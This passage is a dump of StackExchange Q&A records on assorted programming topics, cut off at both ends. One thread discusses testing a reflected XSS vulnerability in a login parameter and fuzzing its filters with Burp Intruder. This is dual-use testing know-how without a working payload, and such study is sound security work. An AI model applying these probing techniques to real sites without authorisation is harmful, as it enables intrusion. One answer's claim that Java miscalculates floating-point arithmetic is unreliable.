{\n clickX.push(x);\n clickY.push(y);\n clickDrag.push(dragging);\n } \n\n function clear_canvas(){\n \/\/alert('masuk claear');\n context.clearRect(0,0,context.canvas.width,context.canvas.height); \n\n }\n\n function redraw(){ \n\n context.strokeStyle = \"#df4b26\";\n context.lineJoin = \"round\";\n context.lineWidth = 5;\n\n for(var i=0; i < clickX.length; i++) { \n context.beginPath();\n if(clickDrag[i] && i){\n context.moveTo(clickX[i-1], clickY[i-1]);\n }else{\n context.moveTo(clickX[i]-1, clickY[i]);\n }\n context.lineTo(clickX[i], clickY[i]);\n context.closePath();\n context.stroke();\n }\n } \n<\/code>\nComment: Would you mind adding a Fiddle or Plunker so we may reproduce your issue accurately and quickly?\nComment: [Can't reproduce](http:\/\/jsfiddle.net\/a92wq06g\/) your issue.\nAnswer: Inside your mouse event handlers, <code>this<\/code> refers to the window object and your <code>this.offsetLeft<\/code> is undefined.\nYou can use <code>getBoundingClientRect<\/code> to get the bounds of your canvas element:\n<code>\/\/ get a reference to your canvas element at the start of your app\nvar canvas=document.getElementById('canvasInAPerfectWorld');\n\n\/\/ example mousedown handler\n\n\/\/ get the current canvas offsets using getBoundingClientRect\nvar BB=canvas.getBoundingClientRect();\nvar offsetX=BB.left;\nvar offsetY=BB.top; \n\n\/\/ calculate the current mouse position relative to the canvas\n\/\/ using e.client and the offsets calculated above\nvar mouseX=parseInt(e.clientX-offsetX);\nvar mouseY=parseInt(e.clientY-offsetY);\n<\/code>\nIf you canvas does not reposition relative to the viewport, you can get the offsets once at the start of your app so they don't need to be recalculated every time inside the mouse handler.\nComment: This worked for me -- with this one modification. I set the \"canvas\" to be the event target object, like so:\n\nvar canvas=e.target;\nAnswer: You could follow the solution in markE's answer (also found here).\nOr you could do the following if your layout allows\n\nSet canvas element to position relative\nUse <code>layerX<\/code> and <code>layerY<\/code> to read the mouse position\n\nThis approach gives a little simpler code.\nBoth methods will be affected by padding and border thickness (they need to be subtracted if any is used). If you want border\/padding it's better to wrap the canvas in a div and then style the div instead.\nExample using relative positioned canvas\n\n<code>var c = document.querySelector(\"canvas\"),\n ctx = c.getContext(\"2d\");\n\nctx.font = \"bold 16px sans-serif\";\n\nc.onmousemove = function(e) {\n \n var x = e.layerX,\n y = e.layerY;\n\n ctx.clearRect(0, 0, 300, 20);\n ctx.fillText(\"x: \" + x + \", y: \" + y, 10, 16);\n};<\/code>\n<code>div {padding:20px}\ncanvas {background:#eee; position:relative}<\/code>\n<code><div><div><canvas><\/canvas><\/div><\/div><\/code>\n\nExample using getBoundingClientRect()\n\n<code>var c = document.querySelector(\"canvas\"),\n ctx = c.getContext(\"2d\");\n\nctx.font = \"bold 16px sans-serif\";\n\nc.onmousemove = function(e) {\n \n var rect = this.getBoundingClientRect(),\n x = e.clientX - rect.left,\n y = e.clientY - rect.top;\n\n ctx.clearRect(0, 0, 300, 20);\n ctx.fillText(\"x: \" + x + \", y: \" + y, 10, 16);\n};<\/code>\n<code>div {padding:20px}\ncanvas {background:#eee; position:relative}<\/code>\n<code><div><div><canvas><\/canvas><\/div><\/div><\/code>\n","meta":{"source":"stackoverflow","title":"Mouse cursor doesn't match with canvas","dup_signals":{}},"subset":"stackexchange"} +{"text":"Reflected XSS - Automatic understanding of filters\n\nQuestion: I'm currently facing this possible reflected XSS vulnerability on a webapp:\nURL = <code>http:\/\/www.test.com\/login\/?login=[PAYLOAD]<\/code>\nWhen a user clicks on this link, it displays a login page that includes the following code:\n<code><a href=\"http:\/\/www.test.com\/login\/[PAYLOAD]><img...><\/img><\/a>\n<\/code>\nI tried to close the <code><a><\/code> tag using <code>><\/code> with different encodings, but this is filtered and displayed as <code>%3E<\/code>. I also tried to close the double quote and use some things like onclick etc. but this is filtered as well. \nSo I was wondering, is there any tool out there that can automatically test all characters in a given set with different encodings to see what is filtered ?\nI could create my own script to do that, but it might save some time and well... reinventing the wheel..\nUpdate:\nSo it appears that there is no tool that provide such capability. ie: test and report for every input what is filtered (and how it renders) or what is not. Burp ends up being the best solution to do that semi-manually, and a Burp extension can be done to fully automate this process. \nComment: Very nice and well presented a question. A well-deserved +1 from me.\nAnswer: You could probably use Burp Suite to do this. Burp Proxy will let you intercept an HTTP request to a specific URL, <code>http:\/\/www.test.com\/login\/?login=[PAYLOAD]<\/code> for example. \nOnce you have intercepted this request you can specify which of the parameters you would like to target using Burp Intruder(in this case <code>login<\/code>). \nNext you can specify a payload that you would like to apply to this parameter. You can choose from a number of existing payloads or you can create your own.\nWhen you begin the attack it will fire a request with every item in your payload set and give you a number of options for examining the result, such as grepping for the payload to see if it made it through intact.\nHope this helps!\nComment: Right on, let me know how it turns out! The grep functionality may work for your needs. Basically you would grep the response to see if the un-encoded character is in there. So if you submit `>` in the payload you would grep for `<a href=\"http:\/\/www.test.com\/login\/>`. If it is encoded the response will contain `<a href=\"http:\/\/www.test.com\/login\/%3E` instead, so it will say there is no match. Let me know if that is confusing.\nComment: Reason for downvote?\nComment: I was wondering as well ? I'll try with Burp Intruder tomorrow, i'm unsure the grep part can be automated as I'd like. I want to see if I can still escape the tag for this particular case, but basically what I would like also is a list, for each input, of what's filtered \/ what's not.\nComment: So I did this with Burp Intruder for this particular test and it worked fine, but after looking everywhere it appears there's no software\/plugin to do this automatically on every input you want. Thank you anyway I'll mark this as the right answer.\nComment: Hrrm, you should be able to specify your own input file. I use the pay version so maybe that is a paid feature?\nComment: I wasn't clear, there's no problem with Burp, I am able to specify my own input file. What I meant is there's no \"point & click\" software to do this with a neat report showing the \"filtering level\" for every input of a webpage\/site (as that was my original question).\n","meta":{"source":"security.stackexchange","title":"Reflected XSS - Automatic understanding of filters","dup_signals":{}},"subset":"stackexchange"} +{"text":"Flex: How can I catch something before I get the error \"Cannot access a property or method of a null object reference\"\n\nQuestion: So, I have a dataprovider that, when the module isn't be used, is set to an empty arrayCollection. Then, when the module is ready to be used, the dataprovider is changed to an array collection full of data. For some reason, another one of my functions is having problems with this. I keep getting the following error:\n\nCannot access a property or method of a null object reference\n\nThe following is the line of code causing the error:\n<code>for (i = 0; i < pickupPhoto.length; i++)\n<\/code>\nIs there any way I can make sure that pickupPhoto has a length property before calling this for loop? I tried the following, but I got the same error:\n<code>if (pickupPhoto.hasOwnProperty(\"length\"))\n<\/code>\nAlso tried:\n<code>if (pickupPhoto.length)\n<\/code>\nThanks in advance,\nBrds\nComment: It's worth noting that the length property isn't what is null here. The only way a null pointer can happen is if pickupPhoto is null.\nAnswer: <code>if (pickupPhoto) {\n for (i = 0; i < pickupPhoto.length; i++) {\n \/* ... *\/\n }\n}\n<\/code>\nAlso, prefer storing the length in a variable instead of calling the <code>length<\/code> getter for every iteration:\n<code>var len:int = pickupPhoto.length;\nfor (i = 0; i < len; i++) {\n \/* ... *\/\n}\n<\/code>\nAnswer: Your problem is not that \"length\" doesn't exist, but that pickupPhoto is actually null. But, you can check for both:\n<code>if (pickupPhoto && \"length\" in pickupPhoto) {\n \/\/ do something with pickupPhoto.length\n}\n<\/code>\nComment: Right. Because `pickupPhoto` is null.\n","meta":{"source":"stackoverflow","title":"Flex: How can I catch something before I get the error \"Cannot access a property or method of a null object reference\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"expand dropdown on focus jquery\n\nQuestion: I am expanding the dropdown on focus which is same as clicking on the dropdown and selecting an option. \n<code> <script type=\"text\/javascript\">\n $(document).ready(function () {\n $('#<%= ddlNature.ClientID %>').focus(function () {\n $('#<%= ddlNature.ClientID %>').attr('size', 6);\n });\n $('#<%= ddlNature.ClientID %>').focusout(function () {\n $('#<%= ddlNature.ClientID %>').attr('size', 1);\n });\n\n });\n<\/script>\n\n<asp:DropDownList ID=\"ddlNature\" runat=\"server\" class=\"text\" TabIndex=\"5\">\n<\/code>\n\nThe dropdown expands on focus but the option selected from the dropdown does not get selected ie. the expanded dropdown does not function as dropdown. I am not getting the value selected when i inspect in the firebug.\nWhen I set AutoPostBack to true of the dropdownlist, I get the dropdown value but I don't want to refresh the page. \nThanks,\nComment: Why dont you use height() & width() functions\nAnswer: The code is just fine..\nFirebug does not display the select changes..\nIf you attach a change handler you will see that it does change it indeed..\nSee demo http:\/\/jsfiddle.net\/gaby\/vxDrE\/\nComment: just saw it looks great..but when we select value, Should not it close the dropdown like size = 1?\nComment: @Kamron, no because you told it that this size is 6.. you only revert it back to normal behavior when you tell it to set size to 1. but that happens on `focusout` (*when you click outside of the select box*)\nComment: @Gaby No the value is not selected because I am changing the value of another dropdown based on the value of the first dropdown.\nComment: I didnt post the question though. but i was curious if we select the data and dropdown should be back to normal, what changes should be done to code.\nComment: can someone pls help me with this it is very urgent pls\nComment: @asifa, is a postback happening when you select an option ? it might be causing the page to reload and perhaps reset the form (*based on what you do server-side*)\nComment: @Gaby when i set to autopostback the value is selected but the page refreshes i want to stop the page from refreshing without affecting the selected value. I tried e.preventDefault() but to no avail\nComment: @asifa, but the change in the other dropdown does it happen server-side ? or client-side ?\nComment: client-side. The value of the dropdown gets selected only when i set the autopostback to true but i don't want the page to refresh\nComment: @asifa, for debugging, did you add a `.change()` handler with jquery to confirm that the change does not happen (*client-side*)?\n","meta":{"source":"stackoverflow","title":"expand dropdown on focus jquery","dup_signals":{}},"subset":"stackexchange"} +{"text":"Explaining refactoring\n\nQuestion: Question\nMy question is how can you teach the methods and importance of tidying-up and refactoring code?\nBackground\nI was recently working on a code review for a colleague. They had made some modifications to a long-gone colleagues work. During the new changes, my colleague had tried to refactor items but gave up as soon as they hit a crash or some other problem (rather than chasing the rabbit down the hole to find the root of the issue) and so reimplemented the problem code and built more on top of that. This left the code in a tangle of workarounds and magic numbers, so I sat down with them to go through refactoring it.\nI tried to explain how I was identifying the places we could refactor and how each refactoring can often highlight new areas. For example, there were two variables that stored the same information - why? I guessed it was a workaround for a bigger issue so I took out one variable and chased the rabbit down the hole, discovering other problems as we went. This eventually led to finding a problem where we were looping over the same things several times. This was due in no small part to the use of arrays of magic number sizes that obfuscated what was being done - fixing the initial \"double-variable\" problem led to this discovery (and others).\nAs I went on this refactoring journey with my colleague, it was evident that she wasn't always able to grasp why we made certain changes and how we could be sure the new functionality matched the original, so I took the time to explain and prove each change by comparing with earlier versions and stepping through the changes on paper. I also explained, through examples, how to tell if a refactoring choice was a bad idea, when to choose comments instead of code changes, and how to select good variable names.\nI felt that the process of sitting together to do this was worthwhile for both myself (I got to learn a bit more about how best to explain things to others) and my colleague (they got to understand more of our code and our coding practices) but, the experience led me to wonder if there was a better way to teach the refactoring process.\n...and finally...\nI understand that what does or does not need refactoring, and how to refactor it are very subjective so I want to steer clear of that discussion, but I am interested to learn how others would tackle the challenge of teaching this important skill, and if others here have had similar experiences and what they learned from them (either as the teacher or the student).\nComment: This question appears to be off-topic because it is not within the bounds of discussion as described in the help center.\nAnswer: Like most programming, refactoring skill comes with practice and experience. It would be nice to think it can be taught, but it has to be learned - and there is a significant difference in the amount of learning that can be accomplished in different environments.\nTo answer your question, you can teach refactoring methods and good design in a pedagogical fashion, and that's fine. But, ultimately, you and I both know attaining a certain level is only through long hard experience.\nComment: So true. Experience is certainly a factor. A colleague of mine also believes there's an element of talent involved and that some are \"born to refactor\".\nAnswer: I am not 100% to understand your question but I think you can refer yourself to Code Smell that need to be refactored.It contain a lot of example that you could show to other.\nHere is a list of when refactoring should be used (list of code smell)\nComment: This is certainly useful, but I'm not convinced it's the best way of teaching someone the concepts and skills required when refactoring.\nComment: At my University (Canada) it was the way they show us why refactoring is important and how to develop ability with by comparing to those smells.\nComment: Yes. It's an important part of learning refactoring (hence the up vote).\nAnswer: If you haven't read it, Martin Fowler has an excellent book on the subject called Refactoring: Improving the Design of Existing Code. He goes into substantial detail about how and why a specific piece of code should be refactored.\nI hesitated to even mention it for fear that knowledge of this book is assumed by someone asking about refactoring, and that you would think, \"Duh, I meant besides the Fowler book.\" But what the hey, there you go. :-)\nComment: Thanks, I know about the book. Like I said, I don't want to discuss what should be refactored and why, I want to discuss how you teach someone that. The book certainly helps, but I think there are other methods.\nAnswer: You don't mention tests. To 'prove' that a refactoring does not break the existing functionality you need to either have existing tests or write tests before doing the refactoring.\nComment: Yes, I understand that testing is important when refactoring, but I want to teach someone the importance of refactoring and how to do it. While tests are an element of refactoring, they aren't necessarily how you teach it.\nAnswer: Pair Programming seems to be the best way for me to get this across. This way, as we're working on real, production code, and we both encounter some code that doesn't smell right, we tackle a code refactoring together. The pair acts as the driver's conscience saying to do the right thing instead of the quick fix, and in turn, they both learn what good code looks like in the process.\nRefactoring can be an art, and just takes practice. The more you do it, the better you get at it. Keep studying the methods described in Martin Fowler's Ractoring book, and use your tools (Resharper for Visual Studio folk)\nComment: This approach was certainly helpful last night. I don't think the project lead will authorise it as an ongoing approach to our work but I'm inclined to use it again in similar circumstances.\nAnswer: One simple way to conceive of refactoring is right there in the name -- it's just like when you factor a common variable out of an equation:\n<code>xy + xz\n<\/code>\nbecomes\n<code>x(y + z)\n<\/code>\nThe x has been factored out. Refactoring code is the same thing, in that you're finding duplicate code or logic and factoring it out.\nComment: I would edit this answer so that it used `\u2022`.\nComment: Thanks. That's a great way of explaining what refactoring is doing, but it doesn't go so far as to teach the actions of refactoring and the practices therein.\nAnswer: It sounds like your approach is a very good one. At the end of the process, you showed how you were able to uncover and fix a lot of problems. For educational purposes, it could then be interesting to invent a new change\/enhancement\/fix. You could then ask your mentoree how they would enact that change with the old a new codebase. Hopefully they'll see that it's much easier to make the new change with the refactored code (or how doing more refactoring would be the easiest way to prepare for the hypothetical change).\nAnswer: I see a couple of different ways you could try to teach refactoring:\nGiven textbook-like examples. A downside here is that you may have contrived or simplistic examples where why refactoring is useful doesn't necessarily shine through as well as in other cases.\nRefactoring existing code. In this case you could take existing legacy code that you'd clean up, or your own code in development and show the before and after doing various bits to see how much better the after is, in terms of readability and ease of maintanence. This may be a better exercise to do as this is live code being improved and enhanced to some extent.\nIt isn't something that someone can pick up instantly, it takes time, practice, effort and patience as some refactorings may be done for personal preference rather than because the code runs optimally one way or another.\nAnswer: Teaching someone to refactor when they aren't a natural is a tough job. In my experience your best bet is to sit down with them in an office and refactor some code. While you are doing this keep up a \"stream of consciousness\" dialog. Talk about what you see, why the code doesn't smell right, options to refactor to, etc. Also you should make sure they're doing the same thing. The most important thing is to impart why, not how, to change the code. Any decent programmer can make a change and have it work, but it takes skill and experience to be able to state why the new solution is better than the previous.\n","meta":{"source":"stackoverflow","title":"Explaining refactoring","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rake trouble finding MySQL after uninstalling Rails 3.0.0\n\nQuestion: So I thought I had fixed the problem posted in this question and I uninstalled Rails 3.0.0 with <code>sudo gem uninstall rails -v 3.0.0<\/code>, but then I had troubles with other things. I took rogerdpack's advice to a different level and uninstalled all of my ruby gems and mysql, then reinstalled them. Now I get the following:\n<code>Icarus:temporary atg$ rails shopping -d mysql\n create ........\nIcarus:temporary atg$ cd shopping\/\nIcarus:shopping atg$ rake db:create\n(in \/Users\/atg\/temporary\/shopping)\nCouldn't create database for {\"reconnect\"=>false, \"encoding\"=>\"utf8\", \"username\"=>\"root\", \"adapter\"=>\"mysql\", \"database\"=>\"shopping_development\", \"pool\"=>5, \"password\"=>nil, \"socket\"=>\"\/tmp\/mysql.sock\"}, charset: utf8, collation: utf8_unicode_ci (if you set the charset manually, make sure you have a matching collation)\n<\/code>\nWhat does this mean and how can I fix it?\nAll help is appreciated and thanks in advance!\nComment: maybe reinstall rails?\nComment: So run `sudo gem uninstall rails; sudo gem install rails -v 2.3.8` is your suggestion?\nAnswer: I restarted after the install and everything worked again. So the key fix was to uninstall and reinstall everything, and then to restart so that changes can take effect.\n","meta":{"source":"stackoverflow","title":"Rake trouble finding MySQL after uninstalling Rails 3.0.0","dup_signals":{}},"subset":"stackexchange"} +{"text":"kill sleeping process in mysql?\n\nQuestion: I have a MySQL database, which is very often filling with sleep process and I have to open my workbench and then have to kill them to free connections & then it will work fine. \nIs there any way I can do that from command line?\nComment: A detailed blog :http:\/\/sforsuresh.in\/how-to-delete-sleeping-processes-in-mysql\/\nAnswer: To list all sleeping process in your database\n<code>sudo \/mysql_rms\/bin\/mysqladmin -S \/mysql_rms\/var\/mysql_rms.sock -p processlist \n<\/code>\nHere you will get list of data , among that list the first field is pid.\nTo Kill all of them\n<code>sudo \/mysql_rms\/bin\/mysqladmin -S \/mysql_rms\/var\/mysql_rms.sock -p kill <id1>,<id2>\n<\/code>\nId's are nothing but pid which was taken above. You can kill one after one or you can kill all of them at a time by appending them one after one by separating with comma (,).\n","meta":{"source":"askubuntu","title":"kill sleeping process in mysql?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Allowing group management to users with limited permissions\n\nQuestion: This may be a shortcoming or bug to-do with access control, but maybe I'm missing something.\nI've setup Drupal permissions and ACLs and they are working 100% except for one thing: users can only view the groups for which they explicitly have an ACL for. In other words, only users with CMS permission to \"View all contacts\" can view groups they themselves created.\nAm I correct in assuming that this is a shortcoming, or is it a bug? Either way, what are y'alls suggestions for allowing users be able to create, edit and manage their own groups without giving them \"View all contacts\"? Is there a way to do it using hook_civicrm_aclWhereClause?\nAnswer: Yes, this is a shortcoming in the current acl system.\nOne possible workaround for this might be to implement the post hook on the civicrm_group object. The post hook can take the contactID of the person creating the group and add an ACL giving this person access to the group.\nYou can implement the above hook in an extension. Probably worth considering including this in core need on a setting\nComment: Thank Donald. I looked at the group object and none of the fields appeared to offer any permissions control more than what was on the create group form, so I think this is a dead end.\nComment: You will need to use the post hook to create the relevant ACLs for that group. The group object does not have any permissioning fields.\nComment: Ohhhhh, I see what you are saying: create a new ACL for every new group. The downside is the the # of ACLs could go up quickly it there are a lot of groups, but good idea!\nAnswer: I a temporary workaround until I have time to fix permissions. It hooks the create group form and prevents users from creating groups whom don't have permission to \"edit all contacts\".\n<code>function memberperms_civicrm_buildForm( $formName, &$form ) {\n if (strpos($formName, \"AddToGroup\")\n and\n !CRM_Core_Permission::check('edit all contacts')\n ) {\n\n \/\/ Display Error Message\n CRM_Core_Session::setStatus(\"Sorry, the group feature is not currently supported for members\", \"Permission Denied\", \"error\");\n\n \/\/ Redirect to civicrm home\n drupal_goto(\"civicrm\"); \n }\n}\n<\/code>\nComment: Hey @bdombro. Any update on this? How did you manage to solve it eventually? Do you know if there is any relevant functionality incorporated in newer CiviCRM versions? Thnx for you time!\nAnswer: This is old, but just in case anyone finds it, I think my Auto Group Extension solves this problem.\n\nCiviCRM AutoGroup extension\nThis extension allows you to choose a set of groups which will be\nadded to new contacts if the logged in contact is also in that group.\ne.g. If Staff member Wilma is in the group 'Region: Birmingham' and\nWilma adds a new contact, it can automatically add the new contact\ninto 'Region: Birmingham' group.\nWhy this was created\nIf you are using Access Control Lists (ACLs) to restrict access based\non groups, e.g. a client of ours has a regional model whereby staff in\ndifferent regions only access contacts for that region, then it's\nannoyingly easy to add a contact and immediately lose access to it\nbecause you forgot to add them into your regional group.\n","meta":{"source":"civicrm.stackexchange","title":"Allowing group management to users with limited permissions","dup_signals":{}},"subset":"stackexchange"} +{"text":"Distance in KM error?\n\nQuestion: This class stores information about a location on Earth. Locations are\nspecified using latitude and longitude. The class includes a method for\ncomputing the distance between two locations in kilometers.\n`* This implementation is based off of the example from Stuart Reges at \n the University of Washington.\n<code>public class GeoLocation \n{\n \/\/ Earth radius in miles\npublic static final double RADIUS = 3963.1676; \n\n\/\/ Number of kilomteres in one mile\npublic static final double KM_PER_MILE = 1.60934;\n\nprivate double latitude;\nprivate double longitude;\n\n\/**\n * Constructs a geo location object with given latitude and longitude\n *\/\npublic GeoLocation(double theLatitude, double theLongitude) \n{\n latitude = theLatitude;\n longitude = theLongitude;\n}\n\n\/**\n * Returns the latitude of this geo location\n *\/\npublic double getLatitude() \n{\n return latitude;\n}\n\n\/**\n * returns the longitude of this geo location\n *\/\npublic double getLongitude() \n{\n return longitude;\n}\n\n\/\/ returns a string representation of this geo location\npublic String toString() \n{\n return \"latitude: \" + latitude + \", longitude: \" + longitude;\n}\n\npublic double distanceFromInKilometers(GeoLocation other)\n{\n double lat1 = Math.toRadians(latitude);\n double long1 = Math.toRadians(longitude);\n double lat2 = Math.toRadians(other.latitude);\n double long2 = Math.toRadians(other.longitude);\n \/\/ apply the spherical law of cosines with a triangle composed of the\n \/\/ two locations and the north pole\n double theCos = Math.sin(lat1) * Math.sin(lat2) +\n Math.cos(lat1) * Math.cos(lat2) * Math.cos(long1 - long2);\n double arcLength = Math.acos(theCos);\n\n return KM_PER_MILE * arcLength * RADIUS;\n}'\n<\/code>\nSo I have this code that is meant to convert to kilometers and:\nSan Francisco to New York City converts currently to 4133.143717886466 which is correct, however International Flight's conversion is 5576.443040444087 when it should be 5576.443040444088, any specific reason this number is off by 1 when the other one works?\nComment: Possible duplicate of [How to resolve a Java Rounding Double issue](http:\/\/stackoverflow.com\/questions\/179427\/how-to-resolve-a-java-rounding-double-issue)\nComment: I have tried adding rounding to it using math.round() and it made it 5576.0\nComment: It has to do with precision. Do you really need to be so precise up to 0.000000000001 kilometer?\nAnswer: I figured it out, for whatever reason Java doesn't do its calculations properly and I found a solution.\n<code>public double distanceFromInKilometers(GeoLocation other)\n{\n double lat1 = Math.toRadians(latitude);\n double long1 = Math.toRadians(longitude);\n double lat2 = Math.toRadians(other.latitude);\n double long2 = Math.toRadians(other.longitude);\n \/\/ apply the spherical law of cosines with a triangle composed of the\n \/\/ two locations and the north pole\n double theCos = Math.sin(lat1) * Math.sin(lat2) +\n Math.cos(lat1) * Math.cos(lat2) * Math.cos(long1 - long2);\n double arcLength = Math.acos(theCos);\n double miles = arcLength * RADIUS\n return KM_PER_MILE * miles;\n}'\n<\/code>\n","meta":{"source":"stackoverflow","title":"Distance in KM error?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rectangle doesn't draw\n\nQuestion: I'm currently coding a game for university and I need a sidepanel for that. So I wanted to draw a rectangle on the side. Below you can see my code. We should just use PyGame for everything.\n<code>def drawRect():\n rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, SCREEN_HEIGHT, PANEL_SIZE, SCREEN_HEIGHT)\n pygame.draw.rect(screen, BLACK, rect2)\n<\/code>\nThe rectangle doesnt pop up on my screen and I just cant figure out why.\nComment: Please make sure the indentation of your code in your question is _identical_ to what is in your actual code, because python is sensitive to indentation errors. I prefer to use [code blocks](\/help\/formatting) with three backticks ( ` ) for this. Since you're new here, please also take the [tour], read [what's on-topic here](\/help\/on-topic), [ask], \nand the [question checklist](\/\/meta.stackoverflow.com\/q\/260648\/843953), \nand provide a [mre]. Welcome to Stack Overflow!\nAnswer: In the Pygame coordinate system, the top left is (0, 0). Hence, the rectangle at the bottom is off the screen. Change the position of the rectangle:\n<code>rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, SCREEN_HEIGHT, PANEL_SIZE, SCREEN_HEIGHT)<\/code>\n<code>rect2 = pygame.Rect(SCREEN_WIDTH - PANEL_SIZE, 0, PANEL_SIZE, SCREEN_HEIGHT)\n<\/code>\n","meta":{"source":"stackoverflow","title":"Rectangle doesn't draw","dup_signals":{}},"subset":"stackexchange"} +{"text":"Plot a flat function (2)\n\nQuestion: (In fact I realize threre are two questiona inside this one)\nThis is an uncredible sequel of the question Plot an apparently flat function.\nAfter a lot of effort and suggestion\n<code> Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {0, 0.0000005}, \n AxesLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nThis gives nothing - there is truly a minimum in the function - and this \n<code>Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {, 0.0000005}, \n AxesLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nworks perfectly even if MA complains.\nSo now how insert this local comportment as a zooming inside a large figure ?\nAnswer: No need for manual setting of the range:\n<code>Plot[Evaluate[E^(x^2 + 7*x - 30)\/Exp[-30]], {x, -4, -3}, \n PlotRange -> {All, Full}, Frame -> True, \n FrameLabel -> {\"x\", \n \"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\nAnswer: You should give PlotRange in its full form:\n<code>Plot[Evaluate[E^(x^2+7*x-30)\/Exp[-30]],{x,-4,-3},PlotRange->{{-4,-3},{4.5*10^-6,6.5*10^-6}},AxesLabel->{\"x\",\"(\\!\\(\\*SubscriptBox[\\(f\\), \\(4\\)]\\)[x]-1)\/Exp[-30]]\"}]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Plot a flat function (2)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is it called the \"Ottoman\" Empire in English language?\n\nQuestion: I don't get why in English language it is called the \"Ottoman\" Empire.\nThe name of the state derives from its founder, Osman I., however how can \"Osman\" be transformed to \"Ottoman\"? For me this doesn't make any sense.\nIn my mother tongue, which is German, it is called \"Osmanisches Reich\", hence \"Osmanic Empire\" appears to me as a more logical English version in my opinion.\nhttps:\/\/de.wikipedia.org\/wiki\/Osmanisches_Reich\nComment: ...Point being, the guy's name was **not** \"Osman\" either. That's just somebody's transliteration into the Latin alphabet of *one* of the versions of the guy's name from Arabic. Arabic is a **different** language, with different sounds than either Turkish, German, or English. This is also why there are something like 12 different spellings floating around for the name \"Quadaffi\".\nComment: Because the pronunciation differs as user244 already answered, Just to provide more info, Arabs pronounce it Uthman. The Turks, Pakistanis, Indians and Iranians (I Think?) Pronounce it as Osman. It was called Osmanli Devleti (Osmani State) or Devlete Ebedi (Eternal State) by the Turks and to others who pronounced the name like them it was known as Khilafah-e-Osmaniye or Sultanate-e-Osmaniye. The English name derives from the Arabic Pronunciation Uthman obviously (Uthman-Otman-Ottoman something like that I reckon)\nComment: \"s\" and \"t\" are actually quite prone to change places with each other, just as \"r\" and \"l\", or \"m\", and \"n\". They might not seem that similar to you but they occur in the same part of the mouth. The change is more often (but not exclusively) from \"t\" or \"th\" sounds to \"ts\" or \"s\" or \"sh\" sounds. Ever notice all those \"-tion\" words in English that are written with a \"t\", were pronounced in Latin with a \"t\", but pronounced in English with a \"sh\"?\nComment: @BruderLustig that's a different thing. Ancient Latin didn't have J, only I; J was a later development, at which point initial I's started \"turning into\" J's. Likewise Latin only had one letter for U\/V\/W (written like V, but sounds like U or W) and the other forms came later. In medieval English you can find an intermediate where they were still considered different forms of one letter, but people wrote the \"u\" form in the middle of words, so you would get things like \"loue\" and \"heauen\".\nComment: @hobbs Are the letters 'v'&'u' and 'i'&'j' also belonging to this sort of similiar letters? Just think on the INRI plaque on the christian cross, in which 'jesus' is obviously written as 'iesus' (I used lowercase letters for better distinction). The name of my hometown in Austria starts with an 'U', in very old documents however the name is written with a 'V' instead with an 'U'.\nComment: You do realise that _in the German Wikipage you posted the link for_ it says: `\"Die [...] Bezeichnung Ottomanisches Reich leitet sich von Varianten der arabischen Namensform Uthman des Dynastiebegr\u00fcnders Osman I. her.\"`\nAnswer: The explanation seems to be related to the attempted spelling of the Arabic for Osman, which came out as utman or Uthman. From wiktionary.org\n\nFrom Middle French Ottoman, from post-classical Latin Ottomanus, from\n Ottoman Turkish \u0639\u062b\u0645\u0627\u0646, from Arabic personal name \u0639\u064f\u062b\u0652\u0645\u064e\u0627\u0646 (\u02bfu\u1e6fm\u0101n).\n Osman is the Turkish spelling of the male Arabic given name Uthman,\n therefore the Ottoman Empire is sometimes referred to as the Osman\n Empire, Osmanic Empire, or Osmanian Empire, after Osman I.\n\nIts also has been discussed here on the English Language & Usage Stack.\nAnswer: As an Arabic speaker, Osman and Uthman\/Othman are really the same name (both are Arabic\/Turkish names). So calling the nation the Ottoman Empire makes sense when comparing with the name Othman.\nAnswer: There is a very strong theory about Osmans real name being Ataman, a Turkic name and that his descendant Murad II(in whose reign the first historical records were written since the foundation)made historians record it as Osman in order to give the state an islamic feeling.\nBut of course, even if it is true, the British were absolutely unaware of this. So, as some others stated, it is probably taken from the French who recorded it based on the arabic spelling Uthman, and from there, it became Ottoman in English.\nComment: I would like to upvote this when a source is provided.\n","meta":{"source":"history.stackexchange","title":"Why is it called the \"Ottoman\" Empire in English language?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Check String of chars\n\nQuestion: I'm looking for an fast method-solutions of my Problem to check a String, if this contains an min one char. IF String contains like any one of character in alphabet then return true, else false.\n<code>public bool checkString(String s)\n{\n return true || false;\n}\n<\/code>\nFor Example:\n<code>\"1232133432454355467\" return false \n\"134324239846c\" return true\n<\/code>\nComment: why not **String.Contains** ?\nComment: Are you wanting to check that a String is alphanumeric, or that it contains more than one character? Or both? Please explain yourself better.\nComment: not alphanumeric just only char.\nComment: Each non-emtpy string contains `char`. `char` is a type in C# representing any character. I guess you actually mean letter.\nAnswer: Try:\n<code>using System;\nusing System.Text.RegularExpressions;\n\nclass Program\n{\n static void Main()\n {\n var r = CheckString(\"112\");\n Console.WriteLine(r); \/\/ false\n r = CheckString(\"112a\");\n Console.WriteLine(r); \/\/ true\n }\n\n public static bool CheckString(String input)\n {\n return Regex.Match(input, @\"[a-zA-Z]\").Success;\n \/\/ or, as @Vlad L suggested\n \/\/return Regex.IsMatch(input, @\"[a-zA-Z]\");\n }\n}\n<\/code>\nIf you want to verify against the \"All Letters\" Unicode character class, use this one instead:\n<code>return Regex.IsMatch(input, @\"\\p{L}\");\n<\/code>\nReference: Supported Unicode General Categories\nComment: Or simply `return Regex.IsMatch(input, @\"[a-zA-Z]\");` :)\nAnswer: If I understood the question correctly... This returns true if the string contains at least one letter.\n<code> public bool checkString(String s)\n {\n return s.Any(x => 